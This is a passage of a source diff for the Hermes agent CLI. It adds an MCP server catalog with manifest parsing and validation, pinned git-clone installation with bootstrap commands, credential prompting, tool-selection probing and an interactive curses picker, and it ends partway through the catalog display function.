"name", help="Official optional skill folder/frontmatter name, or 'all'"
)
skills_repair_official.add_argument(
"--restore",
action="store_true",
help="Restore from official optional source, backing up existing matching copies",
)
skills_repair_official.add_argument(
"--yes",
"-y",
action="store_true",
help="Skip confirmation prompt when using --restore",
)
skills_publish = skills_subparsers.add_parser(
"publish", help="Publish a skill to a registry"
)
@@ -13018,6 +13317,24 @@ Examples:
)
mcp_login_p.add_argument("name", help="Server name to re-authenticate")
# ── Catalog (Nous-approved MCPs shipped with the repo) ─────────────────
mcp_sub.add_parser(
"picker",
help="Interactive catalog picker (also the default for `hermes mcp`)",
)
mcp_sub.add_parser(
"catalog",
help="List Nous-approved MCPs available for one-click install",
)
mcp_install_p = mcp_sub.add_parser(
"install",
help="Install a catalog MCP by name (e.g. `hermes mcp install n8n`)",
)
mcp_install_p.add_argument(
"identifier",
help="Catalog entry name (or `official/<name>`)",
)
_add_accept_hooks_flag(mcp_parser)
def cmd_mcp(args):
@@ -13431,6 +13748,17 @@ Examples:
default=False,
help="Assume yes for interactive prompts (config migration, stash restore). API-key entry is skipped; run 'hermes config migrate' separately for those.",
)
update_parser.add_argument(
"--branch",
default=None,
metavar="NAME",
help=(
"Update against this branch instead of the default (main). "
"If the local checkout is on a different branch, hermes will "
"switch to the requested branch first (auto-stashing any "
"uncommitted changes)."
),
)
update_parser.add_argument(
"--force",
action="store_true",
+776
View File
@@ -0,0 +1,776 @@
"""MCP catalog — curated, Nous-approved MCP servers shipped with the repo.
Mirrors the optional-skills/ pattern: each catalog entry lives under
``optional-mcps/<name>/manifest.yaml`` and ships disabled. Users discover
entries via ``hermes mcp catalog`` or the interactive ``hermes mcp picker``,
and install them with ``hermes mcp install <name>`` (or by toggling in the
picker, which flows them through any required env/OAuth setup).
Catalog policy:
- Entries are added only by merging a PR into hermes-agent. Presence in the
``optional-mcps/`` directory = Nous approval. No community tier, no trust
signals beyond "it's in the catalog".
- Manifests pin transport details (commands, args, refs). MCPs are never
auto-updated; users explicitly re-run ``hermes mcp install <name>`` to
pull a new manifest version after a repo update.
- Secrets prompted at install time go to ``~/.hermes/.env`` (the
.env-is-for-secrets rule). Non-secret env vars also go to .env to keep
one credential store.
See website/docs/user-guide/mcp-catalog.md for user docs.
See references/mcp-catalog.md (this repo's skill) for the manifest schema.
"""
from __future__ import annotations
import os
import re
import shutil
import subprocess
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any, Dict, List, Optional
import yaml
from hermes_constants import get_hermes_home, get_optional_mcps_dir
from hermes_cli.colors import Colors, color
from hermes_cli.config import (
load_config,
save_config,
get_env_value,
save_env_value,
)
from hermes_cli.cli_output import prompt as _prompt_input, prompt_yes_no
_MANIFEST_VERSION = 1
# Substituted at install time inside `transport.command` / `transport.args`.
_INSTALL_DIR_VAR = "${INSTALL_DIR}"
# ─── Data classes ────────────────────────────────────────────────────────────
@dataclass
class EnvVarSpec:
name: str
prompt: str
required: bool = True
secret: bool = True
default: str = ""
@dataclass
class AuthSpec:
type: str # "api_key" | "oauth" | "none"
env: List[EnvVarSpec] = field(default_factory=list)
# OAuth-specific (case 2: third-party provider like Google)
provider: Optional[str] = None
scopes: List[str] = field(default_factory=list)
env_var: Optional[str] = None
@dataclass
class TransportSpec:
type: str # "stdio" | "http"
command: Optional[str] = None
args: List[str] = field(default_factory=list)
url: Optional[str] = None
version: Optional[str] = None # informational, pinned
@dataclass
class InstallSpec:
"""Optional bootstrap step (git clone + dep install).
Omit for one-shot launchable servers (npx, uvx).
"""
type: str # "git"
url: str
ref: str # commit/tag/branch — pinned, never floats
bootstrap: List[str] = field(default_factory=list)
@dataclass
class ToolsSpec:
"""Manifest-side tool-selection hints.
Drives the pre-checked state of the install-time tool checklist, and acts
as the fallback selection when probe fails. See install_entry() flow.
"""
# If declared, these tool names are pre-checked in the checklist (or
# applied directly when probe fails). If None, all probed tools are
# pre-checked (or no filter is written when probe fails).
default_enabled: Optional[List[str]] = None
@dataclass
class CatalogEntry:
name: str
description: str
source: str
transport: TransportSpec
auth: AuthSpec
tools: ToolsSpec = field(default_factory=ToolsSpec)
install: Optional[InstallSpec] = None
post_install: str = ""
manifest_path: Path = field(default_factory=Path)
# ─── Manifest loader ─────────────────────────────────────────────────────────
class CatalogError(Exception):
"""Manifest parse/validation failure or install error."""
def _catalog_root() -> Path:
"""Return the optional-mcps/ directory shipped with this Hermes install."""
# Prefer the env-var override / packaged location; fall back to the repo's
# optional-mcps/ next to the package (source checkout).
return get_optional_mcps_dir(Path(__file__).parent.parent / "optional-mcps")
def _parse_env_spec(raw: Any) -> EnvVarSpec:
if not isinstance(raw, dict):
raise CatalogError(f"env entry must be a mapping, got {type(raw).__name__}")
name = raw.get("name") or ""
if not name or not re.match(r"^[A-Za-z_][A-Za-z0-9_]*$", name):
raise CatalogError(f"invalid env var name: {name!r}")
return EnvVarSpec(
name=name,
prompt=raw.get("prompt") or name,
required=bool(raw.get("required", True)),
secret=bool(raw.get("secret", True)),
default=str(raw.get("default") or ""),
)
def _parse_manifest(path: Path) -> CatalogEntry:
"""Read and validate a manifest.yaml. Raise CatalogError on any problem."""
try:
with open(path, "r", encoding="utf-8") as f:
data = yaml.safe_load(f) or {}
except Exception as exc:
raise CatalogError(f"failed to read {path}: {exc}") from exc
if not isinstance(data, dict):
raise CatalogError(f"{path}: manifest must be a mapping")
mv = data.get("manifest_version")
if mv != _MANIFEST_VERSION:
raise CatalogError(
f"{path}: manifest_version {mv!r} unsupported "
f"(this Hermes understands version {_MANIFEST_VERSION})"
)
name = data.get("name") or ""
if not name or not re.match(r"^[A-Za-z0-9_-]+$", name):
raise CatalogError(f"{path}: invalid or missing 'name'")
description = str(data.get("description") or "").strip()
if not description:
raise CatalogError(f"{path}: 'description' required")
source = str(data.get("source") or "").strip()
transport_raw = data.get("transport") or {}
if not isinstance(transport_raw, dict):
raise CatalogError(f"{path}: 'transport' must be a mapping")
t_type = transport_raw.get("type")
if t_type not in ("stdio", "http"):
raise CatalogError(f"{path}: transport.type must be 'stdio' or 'http'")
args = transport_raw.get("args") or []
if not isinstance(args, list):
raise CatalogError(f"{path}: transport.args must be a list")
transport = TransportSpec(
type=t_type,
command=transport_raw.get("command"),
args=[str(a) for a in args],
url=transport_raw.get("url"),
version=transport_raw.get("version"),
)
if t_type == "stdio" and not transport.command:
raise CatalogError(f"{path}: stdio transport requires 'command'")
if t_type == "http" and not transport.url:
raise CatalogError(f"{path}: http transport requires 'url'")
auth_raw = data.get("auth") or {"type": "none"}
if not isinstance(auth_raw, dict):
raise CatalogError(f"{path}: 'auth' must be a mapping")
a_type = auth_raw.get("type") or "none"
if a_type not in ("api_key", "oauth", "none"):
raise CatalogError(f"{path}: auth.type must be 'api_key'|'oauth'|'none'")
env_list_raw = auth_raw.get("env") or []
if not isinstance(env_list_raw, list):
raise CatalogError(f"{path}: auth.env must be a list")
env_list = [_parse_env_spec(e) for e in env_list_raw]
auth = AuthSpec(
type=a_type,
env=env_list,
provider=auth_raw.get("provider"),
scopes=list(auth_raw.get("scopes") or []),
env_var=auth_raw.get("env_var"),
)
tools_raw = data.get("tools") or {}
if not isinstance(tools_raw, dict):
raise CatalogError(f"{path}: 'tools' must be a mapping")
default_enabled = tools_raw.get("default_enabled")
if default_enabled is not None:
if not isinstance(default_enabled, list) or not all(
isinstance(t, str) for t in default_enabled
):
raise CatalogError(
f"{path}: tools.default_enabled must be a list of strings"
)
tools_spec = ToolsSpec(default_enabled=default_enabled)
install: Optional[InstallSpec] = None
install_raw = data.get("install")
if install_raw is not None:
if not isinstance(install_raw, dict):
raise CatalogError(f"{path}: 'install' must be a mapping")
i_type = install_raw.get("type")
if i_type != "git":
raise CatalogError(f"{path}: install.type must be 'git' (got {i_type!r})")
url = install_raw.get("url") or ""
ref = install_raw.get("ref") or ""
if not url or not ref:
raise CatalogError(f"{path}: install.url and install.ref are required")
bootstrap = install_raw.get("bootstrap") or []
if not isinstance(bootstrap, list):
raise CatalogError(f"{path}: install.bootstrap must be a list")
install = InstallSpec(
type=i_type,
url=url,
ref=ref,
bootstrap=[str(c) for c in bootstrap],
)
return CatalogEntry(
name=name,
description=description,
source=source,
transport=transport,
auth=auth,
tools=tools_spec,
install=install,
post_install=str(data.get("post_install") or ""),
manifest_path=path,
)
def list_catalog() -> List[CatalogEntry]:
"""Return all valid catalog entries, sorted by name.
Invalid manifests are skipped silently (CI tests catch them at PR time).
Manifests with a future ``manifest_version`` are also skipped, but the
skip is surfaced via :func:`catalog_diagnostics` so the picker / catalog
UIs can tell the user their Hermes is out of date.
"""
root = _catalog_root()
if not root.exists():
return []
entries: List[CatalogEntry] = []
_CATALOG_DIAGNOSTICS.clear()
for child in sorted(root.iterdir()):
manifest = child / "manifest.yaml"
if not manifest.is_file():
continue
try:
entries.append(_parse_manifest(manifest))
except CatalogError as exc:
msg = str(exc)
# Recognize the future-manifest error specifically so the UI can
# surface a more actionable nudge than "broken manifest".
if "manifest_version" in msg and "unsupported" in msg:
_CATALOG_DIAGNOSTICS.append((child.name, "future_manifest", msg))
else:
_CATALOG_DIAGNOSTICS.append((child.name, "invalid", msg))
continue
return entries
# Populated by list_catalog(). Inspected by the picker / catalog UIs so the
# user gets actionable feedback instead of a silently-shorter list.
_CATALOG_DIAGNOSTICS: List[tuple] = []
def catalog_diagnostics() -> List[tuple]:
"""Diagnostics from the most recent :func:`list_catalog` call.
Returns a list of ``(entry_name, kind, message)`` tuples where ``kind``
is one of:
- ``future_manifest`` manifest_version is newer than this Hermes
understands. Update Hermes to install this entry.
- ``invalid`` manifest is malformed in some other way (caught by
CI for shipped manifests; user-modified manifests can hit this).
"""
return list(_CATALOG_DIAGNOSTICS)
def get_entry(name: str) -> Optional[CatalogEntry]:
"""Look up a single entry by name. ``official/<name>`` prefix accepted."""
if name.startswith("official/"):
name = name[len("official/"):]
for entry in list_catalog():
if entry.name == name:
return entry
return None
# ─── Status helpers ──────────────────────────────────────────────────────────
def installed_servers() -> Dict[str, dict]:
"""Return current ``mcp_servers`` block from config.yaml."""
cfg = load_config()
servers = cfg.get("mcp_servers") or {}
return servers if isinstance(servers, dict) else {}
def is_installed(name: str) -> bool:
return name in installed_servers()
def is_enabled(name: str) -> bool:
servers = installed_servers()
cfg = servers.get(name)
if not cfg:
return False
enabled = cfg.get("enabled", True)
if isinstance(enabled, str):
return enabled.lower() in {"true", "1", "yes"}
return bool(enabled)
# ─── Install ─────────────────────────────────────────────────────────────────
def _install_root() -> Path:
"""Where git-bootstrapped MCPs are cloned. Per-user, profile-aware."""
root = get_hermes_home() / "mcp-installs"
root.mkdir(parents=True, exist_ok=True)
return root
def _run_bootstrap(cwd: Path, commands: List[str]) -> None:
"""Execute bootstrap commands in *cwd*. Raise CatalogError on first failure.
Each command runs through the shell (so `&&` etc. work). The output is
streamed to the user's terminal for visibility.
"""
for cmd in commands:
print(color(f" $ {cmd}", Colors.DIM))
proc = subprocess.run(cmd, cwd=str(cwd), shell=True)
if proc.returncode != 0:
raise CatalogError(
f"bootstrap step failed (exit {proc.returncode}): {cmd}"
)
def _do_git_install(entry: CatalogEntry) -> Path:
"""Clone the entry's repo into ``~/.hermes/mcp-installs/<name>`` and run
bootstrap commands. Returns the install directory."""
assert entry.install is not None and entry.install.type == "git"
install = entry.install
dest = _install_root() / entry.name
git = shutil.which("git")
if not git:
raise CatalogError("git is required to install this MCP but was not found on PATH")
if dest.exists():
# Fresh checkout each install — manifest version is the source of truth,
# so wipe + re-clone for determinism.
print(color(f" Removing existing install at {dest}", Colors.DIM))
shutil.rmtree(dest)
print(color(f" Cloning {install.url} ({install.ref}) → {dest}", Colors.CYAN))
# `git clone --branch` only accepts branches and tags, NOT commit SHAs.
# Detecting SHA-shaped refs upfront avoids a guaranteed stderr leak on
# the fast path (the --branch attempt would always fail noisily for a
# SHA ref before we fall back to full-clone-then-checkout).
is_sha_ref = bool(re.fullmatch(r"[0-9a-f]{7,40}", install.ref))
if not is_sha_ref:
proc = subprocess.run(
[git, "clone", "--depth", "1", "--branch", install.ref, install.url, str(dest)],
)
if proc.returncode == 0:
pass
else:
# Branch/tag form failed (unlikely for valid manifests; possible if
# the ref was deleted upstream). Fall through to the full-clone path.
if dest.exists():
shutil.rmtree(dest)
is_sha_ref = True # treat the same as a SHA ref from here
if is_sha_ref:
proc = subprocess.run([git, "clone", install.url, str(dest)])
if proc.returncode != 0:
raise CatalogError(f"git clone failed for {install.url}")
proc = subprocess.run([git, "-C", str(dest), "checkout", install.ref])
if proc.returncode != 0:
raise CatalogError(f"git checkout {install.ref} failed")
if install.bootstrap:
_run_bootstrap(dest, install.bootstrap)
return dest
def _expand_install_dir(value: str, install_dir: Optional[Path]) -> str:
if _INSTALL_DIR_VAR not in value:
return value
if install_dir is None:
raise CatalogError(
f"manifest references {_INSTALL_DIR_VAR} but no install block exists"
)
return value.replace(_INSTALL_DIR_VAR, str(install_dir))
def _prompt_env_vars(specs: List[EnvVarSpec]) -> Dict[str, str]:
"""Walk the env spec list, prompting the user for each. Writes secrets and
non-secrets alike to ~/.hermes/.env via save_env_value()."""
collected: Dict[str, str] = {}
for spec in specs:
existing = get_env_value(spec.name)
if existing:
print(color(f"{spec.name} already set in .env", Colors.GREEN))
collected[spec.name] = existing
continue
value = _prompt_input(
spec.prompt,
default=spec.default or None,
password=spec.secret,
)
if not value:
if spec.required:
raise CatalogError(f"{spec.name} is required but no value was provided")
continue
save_env_value(spec.name, value)
collected[spec.name] = value
return collected
def _build_server_config(
entry: CatalogEntry, install_dir: Optional[Path]
) -> dict:
"""Translate a manifest into the ``mcp_servers.<name>`` block format used
by hermes_cli/mcp_config.py."""
cfg: dict = {}
t = entry.transport
if t.type == "stdio":
cfg["command"] = _expand_install_dir(t.command or "", install_dir)
if t.args:
cfg["args"] = [_expand_install_dir(a, install_dir) for a in t.args]
elif t.type == "http":
cfg["url"] = t.url
if entry.auth.type == "oauth":
cfg["auth"] = "oauth"
return cfg
def _read_prior_tool_selection(name: str) -> Optional[List[str]]:
"""Return the user's prior `tools.include` for *name*, if any.
Used during reinstalls so the install-time checklist starts pre-checked
with whatever the user already had. Tools no longer on the server are
silently dropped at checklist-display time.
"""
servers = installed_servers()
cfg = servers.get(name) or {}
tools_cfg = cfg.get("tools") or {}
if not isinstance(tools_cfg, dict):
return None
include = tools_cfg.get("include")
if isinstance(include, list) and all(isinstance(t, str) for t in include):
return list(include)
return None
def _probe_tools(name: str) -> Optional[List[tuple]]:
"""Connect to a freshly-configured MCP and list its tools.
Returns a list of ``(tool_name, description)`` tuples on success, or
``None`` on any failure (server unreachable, OAuth not yet completed,
backing service offline, etc.). Failures are intentionally swallowed
here the fallback path in :func:`_apply_tool_selection` handles them.
"""
servers = installed_servers()
server_cfg = servers.get(name)
if not server_cfg:
return None
try:
# Import lazily so the catalog module stays cheap to load.
from hermes_cli.mcp_config import _probe_single_server
tools = _probe_single_server(name, server_cfg)
return list(tools) if tools is not None else []
except Exception as exc:
# Display the cause but never raise from the install path.
print(color(f" Probe failed: {exc}", Colors.YELLOW))
return None
def _write_tools_include(name: str, include: Optional[List[str]]) -> None:
"""Persist or clear ``mcp_servers.<name>.tools.include``."""
cfg = load_config()
servers = cfg.setdefault("mcp_servers", {})
server_entry = servers.get(name) or {}
if include is None:
# No filter — drop any existing tools block.
server_entry.pop("tools", None)
else:
tools_block = server_entry.get("tools") or {}
if not isinstance(tools_block, dict):
tools_block = {}
tools_block["include"] = list(include)
tools_block.pop("exclude", None)
server_entry["tools"] = tools_block
servers[name] = server_entry
cfg["mcp_servers"] = servers
save_config(cfg)
def _apply_tool_selection(
entry: CatalogEntry, *, prior_selection: Optional[List[str]]
) -> None:
"""Probe the server and let the user pick which tools to enable.
Probe-success path:
- Curses checklist of all probed tools.
- Pre-check uses (in priority order):
1. *prior_selection* (reinstall: preserve what the user had)
2. manifest's ``tools.default_enabled``
3. all tools (default)
- All-on selection clears any filter (no ``tools.include`` written).
- Sub-selection writes ``tools.include``.
Probe-fail path:
- If manifest declares ``tools.default_enabled`` apply directly.
- Otherwise leave config with no filter (all on when reachable).
- Either way, point the user at ``hermes mcp configure <name>``.
"""
print()
print(color(f" Probing '{entry.name}' for available tools...", Colors.CYAN))
probed = _probe_tools(entry.name)
# Probe failure path
if probed is None:
manifest_default = entry.tools.default_enabled
if manifest_default:
_write_tools_include(entry.name, manifest_default)
print(color(
f" Couldn\'t probe server. Applied manifest default "
f"({len(manifest_default)} tools). "
f"Run `hermes mcp configure {entry.name}` after the server "
"is reachable to refine.",
Colors.YELLOW,
))
else:
_write_tools_include(entry.name, None)
print(color(
f" Couldn\'t probe server; installed with no tool filter "
"(all tools enabled when reachable). "
f"Run `hermes mcp configure {entry.name}` after first "
"connect to prune.",
Colors.YELLOW,
))
return
if not probed:
# Probe succeeded but server reported zero tools. Nothing to filter.
_write_tools_include(entry.name, None)
print(color(" Server reported no tools.", Colors.YELLOW))
return
tool_names = [t[0] for t in probed]
# Build the pre-checked set in priority order
if prior_selection:
pre_set = {n for n in prior_selection if n in tool_names}
elif entry.tools.default_enabled:
pre_set = {n for n in entry.tools.default_enabled if n in tool_names}
else:
pre_set = set(tool_names)
pre_indices = {i for i, n in enumerate(tool_names) if n in pre_set}
# Non-TTY: skip the checklist. Priority matches the interactive
# pre-check priority: prior user selection > manifest default > all-on.
import sys as _sys
if not _sys.stdin.isatty():
if prior_selection is not None:
include = [n for n in prior_selection if n in tool_names]
_write_tools_include(entry.name, include)
elif entry.tools.default_enabled:
include = [n for n in entry.tools.default_enabled if n in tool_names]
_write_tools_include(entry.name, include)
else:
_write_tools_include(entry.name, None)
return
print(color(
f" Found {len(probed)} tool(s). "
f"Pre-checked: {len(pre_indices)}.",
Colors.GREEN,
))
from hermes_cli.curses_ui import curses_checklist
labels = [
f"{n}{(d[:60] + '...') if len(d) > 60 else d}"
for n, d in probed
]
chosen_indices = curses_checklist(
f"Select tools for '{entry.name}' (SPACE toggle, ENTER confirm)",
labels,
pre_indices,
)
if not chosen_indices:
# User unchecked everything; treat as "no tools" — write empty include
# so the server is installed but contributes nothing until reconfigured.
_write_tools_include(entry.name, [])
print(color(
f" No tools selected. Run `hermes mcp configure {entry.name}` "
"to change.",
Colors.YELLOW,
))
return
if len(chosen_indices) == len(probed):
# Everything selected — clear filter for the cleanest config shape.
# NOTE: this means any tools the server adds later (e.g. a future MCP
# version) will also be auto-enabled. To pin to the current set,
# the user can re-run `hermes mcp configure <name>` and unselect a
# tool to switch back to include-mode.
_write_tools_include(entry.name, None)
print(color(
f" ✓ All {len(probed)} tools enabled (no filter — new tools "
"the server adds later will be auto-enabled).",
Colors.GREEN,
))
return
chosen_names = [tool_names[i] for i in sorted(chosen_indices)]
_write_tools_include(entry.name, chosen_names)
print(color(
f"{len(chosen_names)}/{len(probed)} tools enabled.",
Colors.GREEN,
))
def install_entry(entry: CatalogEntry, *, enable: bool = True) -> None:
"""Install a catalog entry end-to-end.
Steps:
1. If ``install.type == git``, clone + run bootstrap commands.
2. If ``auth.type == api_key``, prompt for env vars, save to .env.
3. If ``auth.type == oauth`` (remote MCP / case 1), write the
``auth: oauth`` marker (MCP client handles browser on first connect
in the non-pre-authenticated case).
4. Translate the manifest into an ``mcp_servers.<name>`` block and
save into config.yaml.
5. Probe the server, present a curses checklist for tool selection,
write ``tools.include`` (or no filter, depending on choice).
If probe fails, fall back to the manifest's
``tools.default_enabled`` or all-on.
6. Print post_install notes.
"""
print()
print(color(f" Installing MCP '{entry.name}'", Colors.CYAN + Colors.BOLD))
if entry.description:
print(color(f" {entry.description}", Colors.DIM))
if entry.source:
print(color(f" Source: {entry.source}", Colors.DIM))
print()
install_dir: Optional[Path] = None
if entry.install is not None:
install_dir = _do_git_install(entry)
# Auth
if entry.auth.type == "api_key":
print()
print(color(" Configure credentials:", Colors.CYAN))
_prompt_env_vars(entry.auth.env)
elif entry.auth.type == "oauth":
if entry.auth.provider:
# Case 2: provider-mediated (Google, GitHub, etc.). We rely on
# the existing `hermes auth <provider>` flow. Surface guidance
# here rather than auto-running it — keeps the catalog install
# decoupled from provider-auth lifecycle.
print(color(
f" This MCP uses {entry.auth.provider} OAuth. Run "
f"`hermes auth {entry.auth.provider}` if you have not "
"already authenticated.",
Colors.YELLOW,
))
else:
print(color(
" This MCP uses native OAuth 2.1; tokens will be acquired "
"on first connection (browser flow).",
Colors.DIM,
))
# auth.type == "none": nothing to do.
# ── Preserve any prior user tool selection across reinstalls ────────
# Reading BEFORE we overwrite the entry below so a reinstall pre-checks
# whatever the user picked last time.
prior_selection = _read_prior_tool_selection(entry.name)
# Build and write the mcp_servers entry (without tools filter yet;
# _apply_tool_selection() finalizes it below).
server_cfg = _build_server_config(entry, install_dir)
server_cfg["enabled"] = enable
cfg = load_config()
cfg.setdefault("mcp_servers", {})[entry.name] = server_cfg
save_config(cfg)
# ── Probe + tool selection ──────────────────────────────────────────
_apply_tool_selection(entry, prior_selection=prior_selection)
print()
print(color(
f" ✓ Installed '{entry.name}' "
f"({'enabled' if enable else 'disabled'}). "
f"Start a new Hermes session to load its tools.",
Colors.GREEN,
))
if entry.post_install:
print()
for line in entry.post_install.strip().splitlines():
print(color(f" {line}", Colors.DIM))
print()
def uninstall_entry(name: str, *, purge_install_dir: bool = True) -> bool:
"""Remove a catalog-installed MCP from config and (optionally) wipe its
clone directory. Returns True if anything was removed."""
cfg = load_config()
servers = cfg.get("mcp_servers") or {}
removed = False
if name in servers:
del servers[name]
if not servers:
cfg.pop("mcp_servers", None)
else:
cfg["mcp_servers"] = servers
save_config(cfg)
removed = True
if purge_install_dir:
clone = _install_root() / name
if clone.exists():
shutil.rmtree(clone)
removed = True
return removed
+27 -4
View File
@@ -749,6 +749,24 @@ def mcp_command(args):
run_mcp_server(verbose=getattr(args, "verbose", False))
return
# Catalog subcommands live in mcp_picker / mcp_catalog. Import lazily so
# the original `mcp_config` module stays import-cheap.
if action == "picker":
from hermes_cli.mcp_picker import run_picker
run_picker()
return
if action == "catalog":
from hermes_cli.mcp_picker import show_catalog
show_catalog()
return
if action == "install":
from hermes_cli.mcp_picker import install_by_name
import sys as _sys
rc = install_by_name(getattr(args, "identifier", "") or "")
if rc:
_sys.exit(rc)
return
handlers = {
"add": cmd_mcp_add,
"remove": cmd_mcp_remove,
@@ -765,15 +783,20 @@ def mcp_command(args):
if handler:
handler(args)
else:
# No subcommand — show list
cmd_mcp_list()
# No subcommand — drop the user into the catalog picker. This is the
# "try enabling and it flows you into setup" UX matching `hermes plugin`.
from hermes_cli.mcp_picker import run_picker
run_picker()
print(color(" Commands:", Colors.CYAN))
_info("hermes mcp Open the catalog picker (default)")
_info("hermes mcp catalog List Nous-approved MCPs")
_info("hermes mcp install <name> Install a catalog MCP")
_info("hermes mcp serve Run as MCP server")
_info("hermes mcp add <name> --url <endpoint> Add an MCP server")
_info("hermes mcp add <name> --url <endpoint> Add a custom MCP server")
_info("hermes mcp add <name> --command <cmd> Add a stdio server")
_info("hermes mcp add <name> --preset <preset> Add from a known preset")
_info("hermes mcp remove <name> Remove a server")
_info("hermes mcp list List servers")
_info("hermes mcp list List configured servers")
_info("hermes mcp test <name> Test connection")
_info("hermes mcp configure <name> Toggle tools")
_info("hermes mcp login <name> Re-authenticate OAuth")
+322
View File
@@ -0,0 +1,322 @@
"""MCP picker — interactive `hermes mcp picker` (also the default `hermes mcp`).
Lists every catalog entry plus any custom MCP servers the user has added via
``hermes mcp add``, lets them pick one, and routes to install / enable /
disable / uninstall / configure-tools flows.
Mirrors the `hermes plugin` picker UX: arrow keys to navigate, ENTER on a row
to act on it. The action depends on current status:
not installed (catalog) install (clone/bootstrap if needed, prompt for creds)
installed / disabled enable
installed / enabled submenu: configure tools / disable / uninstall / reinstall
custom (non-catalog) submenu: configure tools / enable / disable / remove
The picker loops until the user hits ESC/q so they can manage multiple
entries in one session.
"""
from __future__ import annotations
import sys
from dataclasses import dataclass
from typing import List, Optional
from hermes_cli.colors import Colors, color
from hermes_cli.cli_output import prompt_yes_no
from hermes_cli.curses_ui import curses_single_select
from hermes_cli.mcp_catalog import (
CatalogEntry,
CatalogError,
catalog_diagnostics,
install_entry,
is_enabled,
is_installed,
list_catalog,
installed_servers,
uninstall_entry,
)
from hermes_cli.config import load_config, save_config
# ─── Status badges ────────────────────────────────────────────────────────────
_STATUS_NOT_INSTALLED = "available"
_STATUS_DISABLED = "installed (disabled)"
_STATUS_ENABLED = "enabled"
_STATUS_CUSTOM_ENABLED = "custom — enabled"
_STATUS_CUSTOM_DISABLED = "custom — disabled"
# ─── Row model — unifies catalog and custom entries ──────────────────────────
@dataclass
class _Row:
"""A row in the picker. ``entry`` is set for catalog rows; for custom
user-added MCPs only ``name`` + ``description`` + status are populated."""
name: str
description: str
status: str
entry: Optional[CatalogEntry] = None # None for non-catalog (custom) rows
@property
def is_custom(self) -> bool:
return self.entry is None
def _build_rows() -> List[_Row]:
"""Return catalog rows + any custom (non-catalog) MCPs found in config."""
catalog_entries = list_catalog()
catalog_names = {e.name for e in catalog_entries}
rows: List[_Row] = []
for entry in catalog_entries:
if not is_installed(entry.name):
status = _STATUS_NOT_INSTALLED
elif is_enabled(entry.name):
status = _STATUS_ENABLED
else:
status = _STATUS_DISABLED
rows.append(
_Row(
name=entry.name,
description=entry.description,
status=status,
entry=entry,
)
)
# Custom MCPs the user added directly (not in the catalog)
for name, cfg in sorted(installed_servers().items()):
if name in catalog_names:
continue
enabled = cfg.get("enabled", True)
if isinstance(enabled, str):
enabled = enabled.lower() in {"true", "1", "yes"}
status = _STATUS_CUSTOM_ENABLED if enabled else _STATUS_CUSTOM_DISABLED
# Use the transport URL/command as the "description" for custom rows
desc = cfg.get("url") or cfg.get("command") or "(no transport)"
rows.append(_Row(name=name, description=str(desc), status=status))
return rows
def _format_row(row: _Row) -> str:
return f"{row.name:<18} {row.status:<24} {row.description}"
# ─── Actions ──────────────────────────────────────────────────────────────────
def _enable_disable(name: str, *, enable: bool) -> None:
cfg = load_config()
servers = cfg.get("mcp_servers") or {}
server = servers.get(name)
if not server:
print(color(f" '{name}' is not installed.", Colors.RED))
return
server["enabled"] = enable
cfg["mcp_servers"] = servers
save_config(cfg)
print(color(
f"'{name}' {'enabled' if enable else 'disabled'}. "
"Start a new Hermes session for changes to take effect.",
Colors.GREEN,
))
def _configure_tools(name: str) -> None:
"""Open the tool selection checklist for an already-installed MCP.
Delegates to the existing ``cmd_mcp_configure`` flow which probes the
server, displays a checklist, and writes ``tools.include``.
"""
import argparse
from hermes_cli.mcp_config import cmd_mcp_configure
cmd_mcp_configure(argparse.Namespace(name=name))
def _remove_custom(name: str) -> None:
"""Remove a non-catalog MCP entry from config.yaml."""
cfg = load_config()
servers = cfg.get("mcp_servers") or {}
if name not in servers:
print(color(f" '{name}' is not configured.", Colors.RED))
return
if not prompt_yes_no(f"Remove '{name}' from mcp_servers?", default=False):
return
del servers[name]
if not servers:
cfg.pop("mcp_servers", None)
else:
cfg["mcp_servers"] = servers
save_config(cfg)
print(color(f" ✓ Removed '{name}'", Colors.GREEN))
def _handle_row(row: _Row) -> None:
"""Act on the picked row based on its current status."""
# === Catalog row, not yet installed ===
if row.entry and not is_installed(row.name):
try:
install_entry(row.entry, enable=True)
except CatalogError as exc:
print(color(f" ✗ install failed: {exc}", Colors.RED))
return
# === Catalog row, installed but disabled ===
if row.entry and not is_enabled(row.name):
_enable_disable(row.name, enable=True)
return
# === Catalog row, installed + enabled OR custom row ===
if row.is_custom:
# Custom (non-catalog) row submenu
actions = [
"Configure tools (probe server + re-pick)",
"Enable" if not is_enabled(row.name) else "Disable",
"Remove from config",
]
choice = curses_single_select(f"Action for '{row.name}' (custom)", actions)
if choice is None:
return
if choice == 0:
_configure_tools(row.name)
elif choice == 1:
_enable_disable(row.name, enable=not is_enabled(row.name))
elif choice == 2:
_remove_custom(row.name)
return
# Catalog row, installed + enabled
print()
print(color(f" '{row.name}' is already enabled.", Colors.DIM))
actions = [
"Configure tools (probe server + re-pick)",
"Disable (keep config, stop loading on next session)",
"Uninstall (remove config and any cloned files)",
"Reinstall (re-clone, re-prompt for credentials)",
]
choice = curses_single_select(f"Action for '{row.name}'", actions)
if choice is None:
return
if choice == 0:
_configure_tools(row.name)
elif choice == 1:
_enable_disable(row.name, enable=False)
elif choice == 2:
if prompt_yes_no(f"Uninstall '{row.name}'?", default=False):
if uninstall_entry(row.name):
print(color(
f" ✓ Uninstalled '{row.name}'. "
"Credentials in .env preserved — delete manually if no longer needed.",
Colors.GREEN,
))
else:
print(color(f" '{row.name}' was not installed", Colors.DIM))
elif choice == 3:
try:
assert row.entry is not None
install_entry(row.entry, enable=True)
except CatalogError as exc:
print(color(f" ✗ reinstall failed: {exc}", Colors.RED))
# ─── Output / entry points ────────────────────────────────────────────────────
def _print_rows_text(rows: List[_Row]) -> None:
"""Plain-text catalog dump used as a fallback when curses can't run, and
as the default output of `hermes mcp catalog`."""
if not rows:
print()
print(color(" No MCPs in the catalog or configured.", Colors.DIM))
print()
return
print()
print(color(" MCP Catalog + configured servers:", Colors.CYAN + Colors.BOLD))
print()
print(f" {'Name':<18} {'Status':<24} Description")
print(f" {'-' * 18} {'-' * 24} {'-' * 11}")
for row in rows:
print(f" {_format_row(row)}")
print()
print(color(
" Install: hermes mcp install <name> Picker: hermes mcp",
Colors.DIM,
))
# Surface manifest-version warnings so users know when their Hermes is
# too old to install everything in the catalog.
diags = catalog_diagnostics()
future = [d for d in diags if d[1] == "future_manifest"]
if future:
print()
for name, _, msg in future:
print(color(
f"'{name}' requires a newer Hermes — run `hermes update` "
"to install this entry.",
Colors.YELLOW,
))
print()
print()
def show_catalog() -> None:
"""`hermes mcp catalog` — print the curated list + custom servers, no interaction."""
